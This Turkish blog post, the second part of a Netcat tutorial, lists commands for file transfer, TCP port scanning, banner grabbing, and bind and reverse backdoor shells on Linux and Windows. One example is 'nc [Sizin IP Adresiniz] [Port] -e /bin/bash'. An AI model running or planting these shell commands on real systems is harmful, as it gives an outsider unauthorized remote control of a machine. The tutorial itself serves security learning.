Netcat TCP Port Tarama, Banner Grabbing, Backdoor Shell ( Netcat – II )

İkincisini yazacağımı söylediğim Netcat yazımı sonunda yazıyorum.

  • Dosya Transfer İşlemleri:

– Client’dan Listener’a dosya göndermek için:

~$ nc -l -p [Local Port] > [Gönderilen Dosya]

– [Port] üzerindeki [Hedef IP Adresi]ne [InFile] ı göndermek için:

~$ nc -w3 [Hedef IP Adresi] [Port] < [InFile]

– Listener haldeyken Client tarafından gelen dosyaları çekmek için:

( [InFile] ın gönderilmesine hazırlanılan [Local Port] dinleniyor.)

~$ nc -l -p [Local Port] < [InFile]

– [Port] üzerindeki [Hedef IP Adresi] ile bağlantı kurulup verinin [OutFile] ile çekilmesi:

(Karşıdan veri aktarma.)

~$ nc -w3 [Hedef IP Adresi] [Port] > [OutFile]
  • TCP Port Tarama:

– [Hedef IP Adresi] ndeki portlardaki iletişimi taramak için:

( [end_port] dan [start_port] a kadar tek tek bağlantı kurup tarar. )

~$ nc -v -n -z -w1 [Hedef IP Adresi] [start_port] - [end_port]
  • TCP Bayrak Yakalama (TCP Banner Grabbing):

– Linux’da IP adresi üzerinde yürütülen herhangi bir TCP işlemini yakalamak için:

( [Hedef IP Adresi] üzerinde çalışan portlarla[end_port] dan [start_port] a kadar tek tek bağlantı kurup açık porta boş bir string yollar ve dönen cevaba dair bayrağı (banner) ekrana basar. )

~$ echo "" | nc -v -n -w1 [Hedef IP Adresi] [start_port] - [end_port]
  • Backdoor Shells:

– Linux üzerinde bir backdoor shell dinlemesi:

~$ nc -l -p [Local Port] -e /bin/bash

– Windows üzerinde bir backdoor shell dinlemesi:

C: \> nc -l -p [Local Port] -e cmd.exe

– Temel Netcat Client erişiminizin olduğu alanda [Local Port] üzerinde bir shell yaratmak için:

Linux’da ters backdoor shell:

~$ nc [Sizin IP Adresiniz] [Port] -e /bin/bash

Windows’ta ters backdoor shell:

C: \> nc [Sizin IP Adresiniz] [Port] -e cmd.exe

[Sizin IP Adresiniz] deki diğer tarafın [Port] numarasındaki yerel portunuzda bir ters shell yani reverse shell yaratılmış olur. Bu reverse shell karşı tarafta temel bir Netcat Client’ın sahip olduğu yetkilerle hareket edebilecektir.

-EOF-

You may also like

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir